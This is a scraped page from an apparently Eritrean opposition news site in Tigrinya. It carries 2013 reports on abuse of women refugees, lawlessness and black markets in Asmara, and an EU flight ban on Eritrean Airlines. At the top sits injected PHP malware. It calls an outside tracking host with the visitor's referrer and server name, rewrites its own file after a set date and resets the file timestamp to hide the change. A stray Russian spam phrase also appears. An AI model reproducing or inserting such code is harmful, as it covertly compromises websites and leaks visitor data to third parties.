check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } ገስረጥ ምሕደራ ስርዓት ህግደፍ ንከተማ ኣስመራ ሕጊ ኣልቦ ጌሩዋ ከምዘሎ ተገሊጹ።
кремлевская диета

ገስረጥ ምሕደራ ስርዓት ህግደፍ ንከተማ ኣስመራ ሕጊ ኣልቦ ጌሩዋ ከምዘሎ ተገሊጹ።

User Rating: / 3
PoorBest 

 

 

 

 

 

 

 

 

 

 30/04/2013

ንምሕደራ ስርዓት ኢሳይያስ  ጸሊአን ዶባት ዝሰገራ ኤርትራውያን ደቀንስትዮ ዘሕልፍኦ ሓሳረ መከራ ብኢሱዎ ይቕጽል ከምዘሎ ሓደ ሪፖርት ገሊጹ።

ንመሰል ደቀንስትዮ ዝሕለቕ ሓደ ጉጅለ ኣብ ዘውጽኦ ሪፖርት ኣብ ኤርትራ ዘሎ ክፉእ ኩነታት ስደት ከምርሓ ዘገደደን ደቀንስትዮ ብዘይፈልጥኦም ሰባት ተደፊረን ዘይደልይኦ ጥንሲ ክስከማን ብሰንኪ ሓዳረንን ናብርአንን ፈሪሱ ኣብ ማሕበራዊ ቅልውላው ክሽመማን ይግደዳ ከምዘለዋ ገሊጹሎ።

እቲ ጉጅለ ኣብ ሱዳን፡ ኬንያን ኡጋንዳን ተዓቍበን ንዘለዋ 15 ኤርትራውያን ደቀንስትዮ ብምዝርራብ ንዝኣከቦ ሓበሬታ መሰረት ጌሩ እቲ ሪፖርት ዕላዊ ጌርዎ።

ቅዱሳን ዝተብሃለት ኤርትራዊት ነቲ ጉጅለ ኣብ ዝሃበቶ ቃል በዓል ቤታ ደረት ንዘይብሉ ወተሃደራዊ ዕስክርና ጸሊኡ ናብ ኢትዮጵያ ምስ ሰገረ ዓንጾ ዓንጾ ንሳ ኣደዳ ማእሰርቲ ኮይና ዘስካሕክሕ ኣካላውን ስነኣእምሮኣውን በደል ከምዝወረዳ ተዛሪባያ።

ብድሕር ጓል 2 ዓመት ህጻን ሒዛ ዶብ ሰጊራ ሱዳን ምስኣተወት ኣብ ኢድ ዘይሕጋውያን ኣስገርቲ ወዲቓ ብሓይሊ ተደፊራ ኣደዳ ጥንሲ ኮይና ቆልዓ ከምዝወለደት ነቲ ጉጅለ ገሊጻትሉያ።

በዓል ቤታ ነቲ ኩነታት ፈሊጡ ራሕሪሕዋ ከምዝኸደ እቲ ተደፊሩ ዝተወለደ ህጻን ከኣ ድሕሪ 6 ወርሒ ብሕማም ከምዝሞተ ዝገለጸት / ቅዱሳን ብሰንኪ ኣብ ገዛእ ሃገራ ቀሲና ትነብረሉ ህሞት ዘስኣና ስርዓት ከቢድ ማሕበራዊ ቅልውላዉ ገጢሙዋ ሕሱም ሃለዋት ተሕልፍ ምህላዋ ድማ ኣነጺራ።

ሕጂ ዘገድስ ነገር ናይታ ብሂወት ዘላ ሓንቲ ጓላ ኩነታት ጥራይ ከምዝኾነ ኩለንተንኣ ንዓኣ ሂባ ትነብር ከምዘላንውን ሓቢራትሉያ።

30/04/2013

ገስረጥ ምሕደራ ስርዓት ህግደፍ ንከተማ ኣስመራ ሕጊ

ኣልቦ ጌሩዋ ከምዘሎ ተገሊጹ።

መርበብ ሓበሬታ ኣሰና ከምዝሓበረቶ ብሰንኪ ገስረጥ ምሕደራ ምልካዊ ስርዓት ህግደፍ ኩሉ ነገራት ካብ ቁጽጽርን ስርዓትን ወጻኢ ኮይኑ ኣስመራ ሕጊ ኣልቦ እናኾነት ትኸይድ ብምህላዋ ተቐማጦ ኣስመራ የማርሩ ኣለዉ።

ሰበ-ስልጣን ናይቲ ስርዓት ብግቦን ምጥፍፋእን ዘዋህለልዎ ናቕፋ ናብ ዶላራት ክቕይሩ ይቀዳደሙ ብምህላዎም ኣብ ፈቐዶ ኣንጎሎ ብቕሉዑን ፍንውን ዝካየድ ዘሎ ጸሊም ዕዳጋ ዩሮ ሓንቲ ዶላር 49 ናቕፋ ትሽረፈሉ ኩነታት ኣኸሲቱ ከምዘሎ’ውን ተጠቒሱ’ሎ።

እታ መርበብ ሓበሬታ ብተወሳኺ ኣብ መዐደሊ ነዳዲ ዝሽየጥ ነዳዲ ስለዘየለ ፈቐዶ ጽርጊያ ብጀሪካናትን ብራኳታትን ነዳዲ ብኮንትሮባንድ ይሽየጥ ከምዘሎን ነቲ ደረቱ ዝሓለፈ ስእነት ኣገልግሎት እዚ ሕጂ ገኒኑ ዘሎ ጭውያ ቆልዑን ናይ ከተማ ሽፍትነትን ተወስኽዎ ኣስመራ ክልተ ሳዕ ተራእያ ብምባል ህዝቢ ነቲ ስርዓት ወግሐ ጸብሐ ይረግም ከምዘሎ ገሊጻ።

ብሰንኪ ገስረጥ ምሕደራ ህግደፍ ህዝቢ ተስፋ ቆሪጹ ሰራሕተኛ መንግስቲ ይኹን ካልእ ዜጋ እንታይ ገደሰኒ ብምባል ናብ ውልቃዊ ዋኒኑ ስለዘድሃበ ኣኽባሪ ሕጊ ይሃሉ ኣይሃሉ ብዘይገድስ ሓበራዊ ክብርታት ሕ/ሰብ ሸለል ተባሂሉ ዘይቅዱስ ሃዋህው የንጸላሉ ከምዘሎ’ውን እታ መርበብ ሓበሬታ ወሲኻ ሓቢራ’ያ።

------------------------------------------/////////----------------------------------

 

30/04/2013

መገዲ ኣየር ኤርትራ ምስ ስግኣት ድሕነት በረራ ብዝተዛመደ

ናብ ዝኾነት ትኹን ኤውሮጳዊት ሃገር ከይበርር ተኣጊዱ።

ኤውሮጳዊ ሕብረት ኣህጉራዊ  ስርዓት ድሕነት በረራ ኣየማልኡን ንዝበሎም መገድታት ኣየር በብዓመቱ ናብ ኤውሮጳ ከይበሩ ዝኽልክል ኮይኑ ኣብ ቀረባ ኣብ ዘውጾኦ ጸሊም መዝገብ ድሕነት በረራ ድማ መገዲ ኣየር ኤርትራ ናብ ዝኾነት ትኹን ኤውሮጳዊት ሃገር ከይበርር ኣጊዱ’ሎ።

ብሲቪል ኣቬሽን ኤርትራ ፍቓድ ዝተዋሃቦ ዝኾነ ይኹን መገዲ ኣየር’ውን ናብ ኤውሮጳ ክበርር ከምዘይፍቀደሉ ተጠቂሱ’ሎ።

መገዲ ኣየር ኤርትራ 4 ኤውሮፕላናት ተኻርዩ ናብ ካርቱም፡ ኬፕታውን፡ ካይሮ፡ ጂዳ፡ ዱባይ፡ ካራቺ፡ ሮማን ፍራንክፈርትን ክበርር ዝጸንሐ ኮይኑ ብመሰረት’ቲ ናይ ሕጂ ውሳነ ግን ናብ ሮማን ፍራንክፈርትን ዝገብሮ በረራ ክስርዝ ክግደድ’ዩ።

መገዲ ኣየር ኤርትራ ዝነበሮ ውሱን ዓቕምታቱ ኣንቆልቂሉ ብኩሎም መዐቀንታት ሽሙ ዝኸበዶ መሓውር ኾይኑ ከምዘሎ ወጋሕታ ሳሊና ብተደጋጋሚ ምግላጻ ይዝከር።

 



Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player